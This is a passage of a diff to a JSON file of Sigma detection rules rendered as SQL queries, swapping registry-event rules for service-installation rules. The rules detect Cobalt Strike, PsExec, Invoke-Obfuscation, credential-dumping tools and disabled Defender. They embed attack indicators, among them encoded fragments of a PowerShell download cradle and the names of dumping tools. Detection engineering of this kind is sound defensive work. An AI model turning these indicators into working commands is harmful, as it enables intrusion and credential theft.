LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE 
'%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "New DLL Added to AppInit_DLLs Registry Key", - "id": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", - "status": "test", - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.010" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + ], + "filename": "win_system_service_install_susp_double_ampersand.yml" + }, + { + "title": "New PDQDeploy Service - Server Side", + "id": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "status": "experimental", + "description": 
"Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "falsepositives": [ + "Legitimate use of the tool" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\') OR (NewName LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\' OR NewName LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows\\\\AppInit\\_Dlls' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployService.exe%' ESCAPE '\\' OR ServiceName IN ('PDQDeploy', 'PDQ Deploy')))" ], - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" + "filename": "win_system_service_install_pdqdeploy.yml" }, { - "title": "Atbroker Registry Change", - "id": "9577edbb-851f-4243-8c91-1d5b50c1a39b", + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - System", + "id": "175997c5-803c-4b08-8bb0-70b099f47595", "status": "experimental", - "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", - "author": "Mateusz Wydra, oscd.community", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", "tags": [ 
"attack.defense_evasion", - "attack.t1218", - "attack.persistence", - "attack.t1547" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Creation of non-default, legitimate at usage" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\' OR TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\atbroker.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\Configuration%' ESCAPE '\\' AND Details = '(Empty)') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Accessibility\\\\ATs%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%new-object%' ESCAPE '\\' AND ImagePath LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND ImagePath LIKE '%readtoend%' ESCAPE '\\' AND (ImagePath LIKE '%:system.io.compression.deflatestream%' ESCAPE '\\' OR ImagePath LIKE '%system.io.streamreader%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_atbroker_change.yml" + "filename": "win_system_invoke_obfuscation_via_compress_services.yml" }, { - "title": "PortProxy Registry Key", - "id": "a54f842a-3713-4b45-8c84-5f136fdebd3c", - "status": "test", - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. 
For command execution see rule win_netsh_port_fwd.yml.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\PortProxy\\\\v4tov4\\\\tcp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_portproxy_registry_key.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND Image LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "title": "Windows Defender Threat Detection Disabled - Service", + "id": "6c0a7755-6d31-44fa-80e1-133e57752680", + "status": "stable", + "description": "Detects the \"Windows Defender Threat Protection\" service has been disabled", + "author": "Ján Trenčanský, frack113", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Administrator actions", + "Auto updates of Windows Defender causes restarts" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '7036' AND Provider_Name = 'Service Control Manager' AND param1 IN ('Windows Defender Antivirus Service', 'Service antivirus Microsoft Defender') AND param2 = 'stopped')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_defender_disabled.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "status": "test", - "description": "Detects the use of 
Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "title": "Mesh Agent Service Installation", + "id": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "status": "experimental", + "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of the tool" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%MeshAgent.exe%' ESCAPE '\\' OR ServiceName LIKE '%Mesh Agent%' ESCAPE '\\'))" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_service_install_mesh_agent.yml" }, { - "title": "New DLL Added to AppCertDlls Registry Key", - "id": "6aa1d992-5925-4e9f-a49b-845e51d1de01", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "author": "Ilyas Ochkov, oscd.community", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.persistence", - "attack.t1546.009" + "attack.execution", + 
"attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\' OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurentControlSet\\\\Control\\\\Session Manager\\\\AppCertDlls' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "TacticalRMM Service Installation", + "id": "4bb79b62-ef12-4861-981d-2aab43fab642", + "status": "experimental", + "description": "Detects a TacticalRMM service installation. 
Tactical RMM is a remote monitoring & management tool.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Legitimate use of the tool" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%tacticalrmm.exe%' ESCAPE '\\' OR ServiceName LIKE '%TacticalRMM Agent Service%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_service_install_tacticalrmm.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - 
"attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "PsExec Service Installation", + "id": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "status": "experimental", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Thomas Patzke", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND ((Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'PSEXESVC' AND ImagePath LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\') OR (EventID = '7036' AND ServiceName = 'PSEXESVC')))" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_service_install_psexec.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", - "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "status": "test", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": 
"win_system_susp_proceshacker.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Important Windows Service Terminated With Error", + "id": 
"d6b5520d-3934-48b4-928c-2aa3f92d6963", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting 
File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", + "status": "experimental", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND 
EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Important Windows Service Terminated Unexpectedly", + "id": "56abae0c-6212-4b97-adc0-0b559bb950c3", + "status": "experimental", + "description": "Detects important or interesting windows services that got terminated unexpectedly.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Rare false positives could occur since service termination could happen due to 